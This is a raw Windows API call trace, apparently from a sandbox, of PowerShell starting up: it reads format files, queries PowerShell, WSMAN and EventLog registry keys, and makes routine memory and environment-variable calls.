	[0300.014] VirtualQuery (in: lpAddress=0x1cc070, lpBuffer=0x1ccf30, dwLength=0x30 | out: lpBuffer=0x1ccf30*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0300.014] VirtualQuery (in: lpAddress=0x1cc070, lpBuffer=0x1ccf30, dwLength=0x30 | out: lpBuffer=0x1ccf30*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0300.014] SetErrorMode (uMode=0x1) returned 0x1
	[0300.014] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0300.014] GetFileType (hFile=0x300) returned 0x1
	[0300.014] SetErrorMode (uMode=0x1) returned 0x1
	[0300.014] GetFileType (hFile=0x300) returned 0x1
	[0300.014] ReadFile (in: hFile=0x300, lpBuffer=0x2f8e260, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2f8e260*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0300.015] ReadFile (in: hFile=0x300, lpBuffer=0x2f8e260, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2f8e260*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0300.015] ReadFile (in: hFile=0x300, lpBuffer=0x2f8e260, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2f8e260*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0300.016] ReadFile (in: hFile=0x300, lpBuffer=0x2f8e260, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2f8e260*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0300.016] ReadFile (in: hFile=0x300, lpBuffer=0x2f8e260, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2f8e260*, lpNumberOfBytesRead=0x1cd398*=0x8b4, lpOverlapped=0x0) returned 1
	[0300.016] ReadFile (in: hFile=0x300, lpBuffer=0x2f8d67c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2f8d67c*, lpNumberOfBytesRead=0x1cd398*=0x0, lpOverlapped=0x0) returned 1
	[0300.016] ReadFile (in: hFile=0x300, lpBuffer=0x2f8e260, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2f8e260*, lpNumberOfBytesRead=0x1cd398*=0x0, lpOverlapped=0x0) returned 1
	[0300.016] SetErrorMode (uMode=0x1) returned 0x1
	[0300.017] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd340 | out: lpFileInformation=0x1cd340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0300.017] SetErrorMode (uMode=0x1) returned 0x1
	[0300.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0300.017] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd428 | out: phkResult=0x1cd428*=0x300) returned 0x0
	[0300.017] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd3ac, lpData=0x0, lpcbData=0x1cd3a8*=0x0 | out: lpType=0x1cd3ac*=0x1, lpData=0x0, lpcbData=0x1cd3a8*=0x56) returned 0x0
	[0300.017] CoTaskMemAlloc (cb=0x5a) returned 0x1b830740
	[0300.017] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd37c, lpData=0x1b830740, lpcbData=0x1cd378*=0x56 | out: lpType=0x1cd37c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd378*=0x56) returned 0x0
	[0300.017] CoTaskMemFree (pv=0x1b830740) 
	[0300.017] RegCloseKey (hKey=0x300) returned 0x0
	[0300.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0300.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0300.018] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x3b57429, Data2=0xa6e9, Data3=0x4c82, Data4=([0]=0xa9, [1]=0xae, [2]=0xe0, [3]=0x91, [4]=0x9b, [5]=0x8e, [6]=0x61, [7]=0x34))) returned 0x0
	[0300.018] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x68b875b3, Data2=0x1538, Data3=0x4bb1, Data4=([0]=0x9e, [1]=0x58, [2]=0x40, [3]=0xff, [4]=0xf9, [5]=0x18, [6]=0x36, [7]=0xd6))) returned 0x0
	[0300.018] SetErrorMode (uMode=0x1) returned 0x1
	[0300.018] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0300.018] GetFileType (hFile=0x300) returned 0x1
	[0300.018] SetErrorMode (uMode=0x1) returned 0x1
	[0300.018] GetFileType (hFile=0x300) returned 0x1
	[0300.019] ReadFile (in: hFile=0x300, lpBuffer=0x2fcc048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2fcc048*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0300.019] ReadFile (in: hFile=0x300, lpBuffer=0x2fcc048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2fcc048*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0300.020] ReadFile (in: hFile=0x300, lpBuffer=0x2fcc048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2fcc048*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0300.020] ReadFile (in: hFile=0x300, lpBuffer=0x2fcc048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2fcc048*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0300.020] ReadFile (in: hFile=0x300, lpBuffer=0x2fcc048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2fcc048*, lpNumberOfBytesRead=0x1cd398*=0xe98, lpOverlapped=0x0) returned 1
	[0300.020] ReadFile (in: hFile=0x300, lpBuffer=0x2fcb648, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2fcb648*, lpNumberOfBytesRead=0x1cd398*=0x0, lpOverlapped=0x0) returned 1
	[0300.020] ReadFile (in: hFile=0x300, lpBuffer=0x2fcc048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2fcc048*, lpNumberOfBytesRead=0x1cd398*=0x0, lpOverlapped=0x0) returned 1
	[0300.020] SetErrorMode (uMode=0x1) returned 0x1
	[0300.020] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd340 | out: lpFileInformation=0x1cd340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0300.020] SetErrorMode (uMode=0x1) returned 0x1
	[0300.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0300.021] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd428 | out: phkResult=0x1cd428*=0x300) returned 0x0
	[0300.021] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd3ac, lpData=0x0, lpcbData=0x1cd3a8*=0x0 | out: lpType=0x1cd3ac*=0x1, lpData=0x0, lpcbData=0x1cd3a8*=0x56) returned 0x0
	[0300.021] CoTaskMemAlloc (cb=0x5a) returned 0x1b830740
	[0300.021] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd37c, lpData=0x1b830740, lpcbData=0x1cd378*=0x56 | out: lpType=0x1cd37c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd378*=0x56) returned 0x0
	[0300.021] CoTaskMemFree (pv=0x1b830740) 
	[0300.021] RegCloseKey (hKey=0x300) returned 0x0
	[0300.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0300.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0300.022] VirtualQuery (in: lpAddress=0x1cbec0, lpBuffer=0x1ccd80, dwLength=0x30 | out: lpBuffer=0x1ccd80*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.022] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xe5edaaf0, Data2=0x969e, Data3=0x4d6a, Data4=([0]=0x8b, [1]=0xe2, [2]=0x4f, [3]=0x52, [4]=0xa9, [5]=0x45, [6]=0x5d, [7]=0x3d))) returned 0x0
	[0300.022] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x9dcf45b6, Data2=0xf12e, Data3=0x4580, Data4=([0]=0x94, [1]=0x89, [2]=0x5, [3]=0x24, [4]=0x9a, [5]=0x67, [6]=0xb7, [7]=0x1a))) returned 0x0
	[0300.034] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0300.034] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0300.035] CoTaskMemFree (pv=0x2468a0) 
	[0300.035] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0300.035] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0300.035] CoTaskMemFree (pv=0x2468a0) 
	[0300.035] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0300.035] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0300.035] CoTaskMemFree (pv=0x2468a0) 
	[0300.036] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0300.036] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0300.036] CoTaskMemFree (pv=0x2468a0) 
	[0300.040] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0300.040] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0300.041] CoTaskMemFree (pv=0x2468a0) 
	[0300.046] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0300.046] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0300.046] CoTaskMemFree (pv=0x2468a0) 
	[0300.047] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0300.047] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0300.047] CoTaskMemFree (pv=0x2468a0) 
	[0300.052] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd638 | out: phkResult=0x1cd638*=0x300) returned 0x0
	[0300.492] RegQueryInfoKeyW (in: hKey=0x300, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd53c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd538, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd53c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd538*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0300.492] CoTaskMemFree (pv=0x0) 
	[0300.493] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0300.493] RegEnumValueW (in: hKey=0x300, dwIndex=0x0, lpValueName=0x292480, lpcchValueName=0x1cd5e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1cd5e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0300.493] CoTaskMemFree (pv=0x292480) 
	[0300.493] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0300.493] RegEnumValueW (in: hKey=0x300, dwIndex=0x1, lpValueName=0x292480, lpcchValueName=0x1cd5e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1cd5e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0300.493] CoTaskMemFree (pv=0x292480) 
	[0300.493] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0300.493] RegEnumValueW (in: hKey=0x300, dwIndex=0x2, lpValueName=0x292480, lpcchValueName=0x1cd5e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1cd5e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0300.493] CoTaskMemFree (pv=0x292480) 
	[0300.494] RegQueryValueExW (in: hKey=0x300, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd5cc, lpData=0x0, lpcbData=0x1cd5c8*=0x0 | out: lpType=0x1cd5cc*=0x1, lpData=0x0, lpcbData=0x1cd5c8*=0x8) returned 0x0
	[0300.494] CoTaskMemAlloc (cb=0xc) returned 0x2fd9f0
	[0300.494] RegQueryValueExW (in: hKey=0x300, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd59c, lpData=0x2fd9f0, lpcbData=0x1cd598*=0x8 | out: lpType=0x1cd59c*=0x1, lpData="2.0", lpcbData=0x1cd598*=0x8) returned 0x0
	[0300.494] CoTaskMemFree (pv=0x2fd9f0) 
	[0300.921] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd588 | out: phkResult=0x1cd588*=0x300) returned 0x0
	[0300.921] RegQueryInfoKeyW (in: hKey=0x300, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd48c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd488, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd48c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd488*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0300.921] CoTaskMemFree (pv=0x0) 
	[0300.921] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0300.921] RegEnumValueW (in: hKey=0x300, dwIndex=0x0, lpValueName=0x292480, lpcchValueName=0x1cd538, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1cd538, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0300.921] CoTaskMemFree (pv=0x292480) 
	[0300.921] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0300.921] RegEnumValueW (in: hKey=0x300, dwIndex=0x1, lpValueName=0x292480, lpcchValueName=0x1cd538, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1cd538, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0300.921] CoTaskMemFree (pv=0x292480) 
	[0300.922] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0300.922] RegEnumValueW (in: hKey=0x300, dwIndex=0x2, lpValueName=0x292480, lpcchValueName=0x1cd538, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1cd538, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0300.922] CoTaskMemFree (pv=0x292480) 
	[0300.922] RegQueryValueExW (in: hKey=0x300, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd51c, lpData=0x0, lpcbData=0x1cd518*=0x0 | out: lpType=0x1cd51c*=0x1, lpData=0x0, lpcbData=0x1cd518*=0x8) returned 0x0
	[0300.922] CoTaskMemAlloc (cb=0xc) returned 0x2fda70
	[0300.922] RegQueryValueExW (in: hKey=0x300, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd4ec, lpData=0x2fda70, lpcbData=0x1cd4e8*=0x8 | out: lpType=0x1cd4ec*=0x1, lpData="2.0", lpcbData=0x1cd4e8*=0x8) returned 0x0
	[0300.922] CoTaskMemFree (pv=0x2fda70) 
	[0300.923] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0300.923] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0300.923] CoTaskMemFree (pv=0x2468a0) 
	[0300.928] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0300.928] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0300.928] CoTaskMemFree (pv=0x2468a0) 
	[0300.934] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5b8 | out: phkResult=0x1cd5b8*=0x304) returned 0x0
	[0300.938] RegQueryInfoKeyW (in: hKey=0x304, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd52c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd528, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd52c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd528*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0300.938] CoTaskMemFree (pv=0x0) 
	[0300.939] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0300.939] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x0, lpName=0x292480, lpcchName=0x1cd5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0300.939] CoTaskMemFree (pv=0x292480) 
	[0300.939] CoTaskMemFree (pv=0x0) 
	[0300.939] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0300.939] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x1, lpName=0x292480, lpcchName=0x1cd5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0300.939] CoTaskMemFree (pv=0x292480) 
	[0300.939] CoTaskMemFree (pv=0x0) 
	[0300.939] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0300.939] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x2, lpName=0x292480, lpcchName=0x1cd5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0300.939] CoTaskMemFree (pv=0x292480) 
	[0300.939] CoTaskMemFree (pv=0x0) 
	[0300.939] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0300.939] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x3, lpName=0x292480, lpcchName=0x1cd5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0300.939] CoTaskMemFree (pv=0x292480) 
	[0300.939] CoTaskMemFree (pv=0x0) 
	[0300.939] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0300.939] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x4, lpName=0x292480, lpcchName=0x1cd5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0300.939] CoTaskMemFree (pv=0x292480) 
	[0300.940] CoTaskMemFree (pv=0x0) 
	[0300.940] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0300.940] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x5, lpName=0x292480, lpcchName=0x1cd5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0300.940] CoTaskMemFree (pv=0x292480) 
	[0300.940] CoTaskMemFree (pv=0x0) 
	[0300.940] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0300.940] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x6, lpName=0x292480, lpcchName=0x1cd5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0300.940] CoTaskMemFree (pv=0x292480) 
	[0300.940] CoTaskMemFree (pv=0x0) 
	[0300.940] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0300.940] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x7, lpName=0x292480, lpcchName=0x1cd5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0300.940] CoTaskMemFree (pv=0x292480) 
	[0300.940] CoTaskMemFree (pv=0x0) 
	[0300.940] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0300.940] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x8, lpName=0x292480, lpcchName=0x1cd5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0300.940] CoTaskMemFree (pv=0x292480) 
	[0300.940] CoTaskMemFree (pv=0x0) 
	[0300.940] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd618 | out: phkResult=0x1cd618*=0x308) returned 0x0
	[0300.940] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd618 | out: phkResult=0x1cd618*=0x0) returned 0x2
	[0300.941] RegOpenKeyExW (in: hKey=0x304, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd618 | out: phkResult=0x1cd618*=0x1cc) returned 0x0
	[0300.941] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd618 | out: phkResult=0x1cd618*=0x0) returned 0x2
	[0300.941] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd618 | out: phkResult=0x1cd618*=0x328) returned 0x0
	[0300.941] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd618 | out: phkResult=0x1cd618*=0x0) returned 0x2
	[0300.941] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd618 | out: phkResult=0x1cd618*=0x32c) returned 0x0
